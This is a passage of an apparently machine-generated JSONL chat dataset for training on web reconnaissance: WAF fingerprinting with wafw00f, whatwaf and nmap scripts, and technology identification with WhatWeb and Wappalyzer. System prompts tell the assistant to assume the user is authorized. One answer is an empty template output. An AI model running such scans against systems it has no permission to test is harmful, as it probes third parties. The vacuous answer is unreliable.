--script=http-waf-fingerprint,http-waf-detect $URL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Web Application Firewall (WAF) - Practice", "response": "wafw00f $URL\nwhatwaf -u $URL\nnmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL", "metadata": {"corpus_index": 2003, "category": "web", "source_file": "docs/src/web/recon/waf-fingerprinting.md", "page_title": "Web Application Firewall (WAF)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `wafw00f $URL`?"}, {"role": "assistant", "content": "This command is used for web application firewall (waf) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `wafw00f $URL`?", "response": "This command is used for web application firewall (waf) - practice. Practice", "metadata": {"corpus_index": 2003, "category": "web", "source_file": "docs/src/web/recon/waf-fingerprinting.md", "page_title": "Web Application Firewall (WAF)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Other technologies - Theory?"}, {"role": "assistant", "content": "A web application usually relies on multiple components which compose the attack surface among which the potential elements:\n\n* the web server (e.g. Apache, Nginx, Microsoft IIS)\n* a Content Management System (CMS)\n* JavaScript Frameworks\n* ...\n\nWhen conducting an audit of a web app, identifying those technologies and the versions in use is necessary to conduct a thorough reconnaissance and correctly map the attack surface."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Other technologies - Theory?", "response": "A web application usually relies on multiple components which compose the attack surface among which the potential elements:\n\n* the web server (e.g. Apache, Nginx, Microsoft IIS)\n* a Content Management System (CMS)\n* JavaScript Frameworks\n* ...\n\nWhen conducting an audit of a web app, identifying those technologies and the versions in use is necessary to conduct a thorough reconnaissance and correctly map the attack surface.", "metadata": {"corpus_index": 2004, "category": "web", "source_file": "docs/src/web/recon/web-technologies.md", "page_title": "Other technologies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Other technologies - Theory"}, {"role": "assistant", "content": "A web application usually relies on multiple components which compose the attack surface among which the potential elements:\n\n* the web server (e.g. Apache, Nginx, Microsoft IIS)\n* a Content Management System (CMS)\n* JavaScript Frameworks\n* ...\n\nWhen conducting an audit of a web app, identifying those technologies and the versions in use is necessary to conduct a thorough reconnaissance and correctly map the attack surface."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Other technologies - Theory", "response": "A web application usually relies on multiple components which compose the attack surface among which the potential elements:\n\n* the web server (e.g. Apache, Nginx, Microsoft IIS)\n* a Content Management System (CMS)\n* JavaScript Frameworks\n* ...\n\nWhen conducting an audit of a web app, identifying those technologies and the versions in use is necessary to conduct a thorough reconnaissance and correctly map the attack surface.", "metadata": {"corpus_index": 2004, "category": "web", "source_file": "docs/src/web/recon/web-technologies.md", "page_title": "Other technologies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Other technologies - Practice work?"}, {"role": "assistant", "content": "Those technologies can usually be identified from the different elements:\n\n* Credits at the bottom or corner of pages\n* HTTP headers\n* Common files (e.g. robots.txt, sitemap.xml)\n* Comments and metadata (HTML, CSS, JavaScript)\n* Stack traces and verbose error messages\n\nAutomated scanning tools can also help identify which technologies are used.\n\n* WhatWeb (Ruby) recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.\n* Wappalyzer is a browser extension that can detect the use of certain software including CMS"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Other technologies - Practice work?", "response": "Those technologies can usually be identified from the different elements:\n\n* Credits at the bottom or corner of pages\n* HTTP headers\n* Common files (e.g. robots.txt, sitemap.xml)\n* Comments and metadata (HTML, CSS, JavaScript)\n* Stack traces and verbose error messages\n\nAutomated scanning tools can also help identify which technologies are used.\n\n* WhatWeb (Ruby) recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.\n* Wappalyzer is a browser extension that can detect the use of certain software including CMS", "metadata": {"corpus_index": 2005, "category": "web", "source_file": "docs/src/web/recon/web-technologies.md", "page_title": "Other technologies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Other technologies - Practice"}, {"role": "assistant", "content": "Those technologies can usually be identified from the different elements:\n\n* Credits at the bottom or corner of pages\n* HTTP headers\n* Common files (e.g. robots.txt, sitemap.xml)\n* Comments and metadata (HTML, CSS, JavaScript)\n* Stack traces and verbose error messages\n\nAutomated scanning tools can also help identify which technologies are used.\n\n* WhatWeb (Ruby) recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.\n* Wappalyzer is a browser extension that can detect the use of certain software including CMS"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Other technologies - Practice", "response": "Those technologies can usually be identified from the different elements:\n\n* Credits at the bottom or corner of pages\n* HTTP headers\n* Common files (e.g. robots.txt, sitemap.xml)\n* Comments and metadata (HTML, CSS, JavaScript)\n* Stack traces and verbose error messages\n\nAutomated scanning tools can also help identify which technologies are used.\n\n* WhatWeb (Ruby) recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.\n* Wappalyzer is a browser extension that can detect the use of certain software including CMS", "metadata": {"corpus_index": 2005, "category": "web", "source_file": "docs/src/web/recon/web-technologies.md", "page_title": "Other technologies", "augmentation_kind": "none", "row_kind": "technique_howto"}}